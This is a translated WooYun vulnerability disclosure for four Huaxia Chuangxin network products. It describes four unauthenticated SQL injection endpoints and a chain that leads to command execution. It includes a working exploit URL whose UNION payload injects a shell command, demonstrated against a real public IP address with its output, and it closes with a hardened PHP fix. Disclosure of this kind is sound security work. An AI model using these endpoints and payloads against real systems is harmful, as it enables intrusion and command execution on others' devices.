
Vulnerability summary

Defect ID: wooyun-2015-0135123

Title: Command execution plus four SQL injection vulnerabilities in four Huaxia Chuangxin devices (no login required)

Vendor: Beijing Huaxia Chuangxin Technology Co., Ltd. (北京华夏创新科技有限公司)

Author: 路人甲

Submitted: 2015-08-19 15:21

Fixed: 2015-11-17 15:30

Published: 2015-11-17 15:30

Vulnerability type: Command execution

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-08-19: Details sent to the vendor, awaiting the vendor's handling
2015-08-19: Vendor confirmed; details visible to the vendor only
2015-08-22: Details opened to third-party security partners
2015-10-13: Details opened to core white hats and relevant domain experts
2015-10-23: Details opened to regular white hats
2015-11-02: Details opened to intern white hats
2015-11-17: Details opened to the public

Brief description:

It would be one thing if your company's four products shared the same code, but I did not expect that code to be copied from someone else...
The vulnerability affects the company's
1. LotApp application delivery system
2. LotBalance load balancer
3. LotWan WAN acceleration system
4. LotServer server acceleration software

Detailed description:

The database used by these four products is SQLite.
The vulnerable files are:

/acc/bindipmac/static_arp_action.php?arpIf=1 (the arpIf parameter is injectable)
/acc/bindipmac/static_arp_bind.php?arpName=1 (the arpName parameter is injectable)
/acc/bindipmac/check_arp_exist_ip.php POST: eth=1&ip=1 (both parameters are injectable)
/acc/bindipmac/static_arp_del.php?x=1&arpName=1 (the arpName parameter is injectable)


All four injections are error-based, as shown below:

http://218.28.233.118/acc/bindipmac/static_arp_action.php?arpIf=1%27
Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[HY000]: General error: 1 near "arp0": syntax error' in /tmp/appexcfg/www/acc/common/databaseWrapper.inc:39 Stack trace: #0 /tmp/appexcfg/www/acc/common/databaseWrapper.inc(39): PDO->prepare('select count(*)...') #1 /tmp/appexcfg/www/acc/common/config/dao/arpDao.inc(151): DatabaseWrapper->prepare('select count(*)...') #2 /tmp/appexcfg/www/acc/bindipmac/static_arp_action.php(42): ARPDao->modifARPConfig(Object(ARPModel), NULL) #3 {main} thrown in /tmp/appexcfg/www/acc/common/databaseWrapper.inc on line 39


Because the SQL injection below allows UNION and leads to command execution, it is used for the demonstration:

/acc/bindipmac/static_arp_del.php?x=1&arpName=1


The code responsible for the vulnerability:

<?php
require_once dirname(__FILE__)."/../common/constant.inc";
include_once dirname(__FILE__)."/../common/config/dao/arpDao.inc";
include_once dirname(__FILE__)."/../common/config/model/arpModel.inc";
require_once dirname ( __FILE__ ) . "/../common/UciUtil.inc";
$arpName = $_REQUEST['arpName']; // taken straight from the request, no filtering
$ttl = $_REQUEST['ttl'];
$ttl++;
$arpDao = new ARPDao();
$arpModel = $arpDao->getARPConfig($arpName); // arpName is built into the SQL query (the injection point)
$arpDao->delARPToSystem($arpModel);          // the row that comes back is handed to a shell command
$arpDao->delARPConfig($arpName);
//syncToFlash();
?>


Following delARPToSystem in /acc/common/config/dao/arpDao.inc:

public function delARPToSystem($arpModel){
    // the three %s values come from the database row and are interpolated into the shell command without quoting
    $ipNeighCmd = "ip neigh del %s lladdr %s dev %s >/dev/null";
    $command = sprintf ( $ipNeighCmd, $arpModel->getIp(), $arpModel->getMac(), $arpModel->getIfname() );
    execute ( $command );
}


Clearly, the result returned by $arpModel = $arpDao->getARPConfig($arpName); flows into delARPToSystem, which gives arbitrary command execution.
So we can construct the following link to execute a command:

/acc/bindipmac/static_arp_del.php?x=1&arpName=1%27%20and%200%20union%20select%201,%27woo||ifconfig>wooyun.txt||yun%27,3,4,5,6,7,8--


The command executed successfully:

http://218.28.233.118/acc/bindipmac/wooyun.txt
eth0 Link encap:Ethernet HWaddr B0:51:8E:04:05:83
inet addr:192.168.3.250 Bcast:192.168.3.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Memory:fbd00000-fbd20000
eth1 Link encap:Ethernet HWaddr B0:51:8E:04:05:84
inet addr:125.46.16.54 Bcast:125.46.16.55 Mask:255.255.255.252
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Memory:fbc00000-fbc20000


Some affected instances:


Proof of vulnerability:

See the output retrieved from http://218.28.233.118/acc/bindipmac/wooyun.txt above.

Fix:

Filter the input.
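The report gives the fix only as "filter". As an added example (not the vendor's code), below is a hardened version of the static_arp_del.php flow and delARPToSystem from the detailed description: the lookup binds arpName as a parameter instead of building the query from it, and every value is validated and quoted before it reaches the shell. The table name "arp", its columns name/ip/mac/ifname, and the database path are assumptions.

```php
<?php
// Added example, not the vendor's code. Assumed: SQLite table "arp" with
// columns name, ip, mac, ifname; database file path is a placeholder.
$pdo = new PDO('sqlite:' . __DIR__ . '/arp.db');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Allow-lists for the three values that end up inside a shell command.
function isValidIp(string $ip): bool {
    return filter_var($ip, FILTER_VALIDATE_IP) !== false;
}
function isValidMac(string $mac): bool {
    return preg_match('/^[0-9a-f]{2}(:[0-9a-f]{2}){5}$/i', $mac) === 1;
}
function isValidIfname(string $if): bool {
    return preg_match('/^[a-z0-9.]{1,15}$/', $if) === 1;   // eth0, br0, eth0.100
}

// Look up the entry with a bound parameter: the user-controlled name is never
// spliced into the query text, so "' and 0 union select ..." is just a name.
function getARPConfigSafe(PDO $pdo, string $arpName): ?array {
    $stmt = $pdo->prepare('SELECT ip, mac, ifname FROM arp WHERE name = :name');
    $stmt->execute([':name' => $arpName]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// A row from the database is still untrusted before it is handed to the shell:
// validate each field, then quote it with escapeshellarg().
function delARPToSystemSafe(array $row): int {
    if (!isValidIp($row['ip']) || !isValidMac($row['mac']) || !isValidIfname($row['ifname'])) {
        throw new InvalidArgumentException('refusing to build a command from a malformed ARP entry');
    }
    $command = sprintf('ip neigh del %s lladdr %s dev %s >/dev/null',
        escapeshellarg($row['ip']), escapeshellarg($row['mac']), escapeshellarg($row['ifname']));
    exec($command, $output, $rc);
    if ($rc !== 0) {
        error_log("ip neigh del failed with exit status $rc");
    }
    return $rc;
}

// The same flow static_arp_del.php performs, using the hardened helpers.
$arpName = (string)($_REQUEST['arpName'] ?? '');
$row = getARPConfigSafe($pdo, $arpName);
if ($row !== null) {
    delARPToSystemSafe($row);
}
```

The validation step matters even with prepared statements: a value written to the table through another (fixed or unfixed) path must not be able to reach the shell unquoted.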

Copyright notice: when reposting, please credit the source: 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 5

Confirmed at: 2015-08-19 15:29

Vendor reply:

Thanks for letting us know

Latest status:

None yet